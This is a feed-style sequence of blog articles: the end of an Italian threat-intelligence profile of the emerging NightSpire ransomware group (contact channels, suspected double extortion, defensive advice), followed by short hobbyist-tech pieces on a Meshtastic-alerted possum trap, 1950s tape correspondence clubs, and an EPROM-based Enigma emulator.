NightSpire offre diversi metodi di contatto attraverso la sua pagina dedicata. Oltre alle classiche email su servizi ProtonMail e OnionMail, hanno anche un canale su Telegram, utilizzato spesso dai gruppi ransomware per comunicare aggiornamenti sui leak, negoziare riscatti e fornire istruzioni alle vittime.
Metodi di contatto identificati:
- Contact Form
- Telegram
Il canale Telegram è probabilmente utilizzato per annunciare nuovi attacchi, interagire con le vittime e gestire le comunicazioni con potenziali affiliati o venditori di dati.
Caratterizzazione del Gruppo
Sebbene non si abbiano ancora informazioni dettagliate sulla loro provenienza o sulle loro tecniche di attacco, alcuni elementi suggeriscono che NightSpire potrebbe essere un gruppo emergente con forti influenze dai modelli RaaS (Ransomware-as-a-Service) già esistenti.
Possibili caratteristiche operative:
- Utilizzo del doppio ricatto (Double Extortion)
- Portale DLS con timer per il rilascio dati
- Canale Telegram per comunicazioni
- Target su aziende di diverse regioni globali
- Estetica e comunicazione simili a gruppi ransomware avanzati
Se si tratta di un nuovo gruppo indipendente o di un rebrand di un attore già esistente è ancora da determinare.
Conclusioni e Considerazioni Finali
NightSpire si presenta come una nuova minaccia nel panorama ransomware. L’assenza di riferimenti a gruppi preesistenti rende difficile tracciare una linea diretta con attori noti, ma il loro modus operandi è chiaramente ispirato a tecniche già collaudate.
Le aziende devono adottare strategie di cyber resilience, rafforzando la protezione degli endpoint, implementando piani di risposta agli incidenti e migliorando la formazione del personale per mitigare il rischio di compromissioni.
Continueremo a monitorare NightSpire per identificare le loro tattiche e procedure operative, valutando il loro impatto nel cybercrime globale.
L'articolo Arriva NightSpire! Un Nuovo Attore nel Panorama del Ransomware proviene da il blog della sicurezza informatica.
Meshtastic Adds Wireless Connectivity to Possum Trap
Perhaps every gardener to attempt to grow a tomato, lettuce, or bean has had to contend with animals trying to enjoy the food before the gardener themselves can, whether it’s a groundhog, rabbit, mouse, crow, or even iguana. There are numerous ways to discourage these mischievous animals from foraging the garden beds including traps, but these devices have their downsides as well. False alarms can be a problem as well as trapping animals that will be overly aggravated to be inside the trap (like skunks) and while the latter problem can’t easily be solved by technology, the former can with the help of Meshtastic.
[Norman Jester]’s problem was an errant possum, but these nocturnal animals generally come out while humans are asleep, and other nighttime animals like rats can activate the trap and then escape. To help with this, a Meshtastic node was added to the San Diego mesh using a 3.5mm audio jack as a detector. When the trap is activated, the closing door yanks a plug out of the jack, alerting the node that the trap has been closed. If it’s a false alarm the trap can be easily and quickly reset, and if a possum has found its way in then it can be transported to a more suitable home the next day.
It’s worth noting that American possums (distinct from the Australian animals of the same name) are an often-misunderstood animal that generally do more good than harm. They help to control Lyme disease, eat a lot of waste that other animals won’t, don’t spread rabies, and don’t cause nearly as much disruption to human life as other animals like feral cats or raccoons. But if one is upsetting a garden or another type of animal is causing a disturbance, this Meshtastic solution does help solve some of the problems with live traps. For smaller animals, though, take a look at this Arudino-powered trap instead.
Thanks to [Dadsrcworkbench] for the tip!
youtube.com/embed/prx-Bxpf7RU?…
A Fast Rewind to the Era of Tapesponding
Imagine a time before Discord servers and cheap long-distance calls. Back in the 1950s, a curious and crafty group of enthusiasts invented their own global social network: on reels of magnetic tape. They called it tapesponding (short for tape corresponding), and it was a booming hobby for thousands of radio hams, tinkerers, and audio geeks. Here’s the original video on this analog marvel.
These folks weren’t just swapping mixtapes. They crafted personal audio letters, beamed across the globe on 3-inch reels. DIY clubs emerged everywhere: World Tape Pals (Texas-based, naturally) clocked 5,000 members from “every Free Nation” – which frames it in a world in terms of East vs. West. Some groups even pooled funds to buy shared tape decks in poorer regions – pure hacker spirit. The tech behind it: Speeds of 3¾ IPS, half-track mono, round-robin reels, and rigorous trust networks to avoid ghosters. Honestly, it makes IRC net ops look soft. Tapesponding wasn’t just for chatty types. It fostered deep friendships, even marriages. It was social engineering before that term was coined. The video is below the break.
What are your thoughts on this nostalgic way of long-distance communication? The warm whirring of a spinning tape reel? The waiting time before your echo is returned? Or are have you skipped all the analog mechanics and shouted out into the LoRaWAN void long ago?
youtube.com/embed/4t9H14XfkPc?…
EPROM-based Enigma Machine
The Enigma machine is perhaps one of the most legendary devices to come out of World War II. The Germans used the ingenious cryptographic device to hide their communications from the Allies, who in turn spent an incredible amount of time and energy in finding a way to break it. While the original Enigma was a complicated electromechanical contraption, [DrMattRegan] recently set out to show how its operation can be replicated with an EPROM.
The German Enigma machine was, for the time, an extremely robust way of coding messages. Earlier versions proved somewhat easy to crack, but subsequent machines added more and more complexity rendering them almost impenetrable. The basis of the system was a set of rotors which encrypted each typed letter to a different one based on the settings and then advanced one place in their rotation, ensuring each letter was encrypted differently than the last. Essentially this is a finite-state machine, something perfectly suited for an EPROM. With all of the possible combinations programmed in advance, an initial rotor setting can be inputted, and then each key press is sent through the Enigma emulator which encrypts the letter, virtually advances the rotors, and then moves to the next letter with each clock cycle.
[DrMattRegan]’s video, also linked below, goes into much more historical and technical detail on how these machines worked, as well as some background on the British bombe, an electromechanical device used for decoding encrypted German messages. The first programmable, electronic, digital computer called Colossus was also developed to break encrypted Enigma messages as well, demonstrating yet another technology that came to the forefront during WWII.
youtube.com/embed/yKOzgzsezyc?…
Thanks to [Clint] for the tip!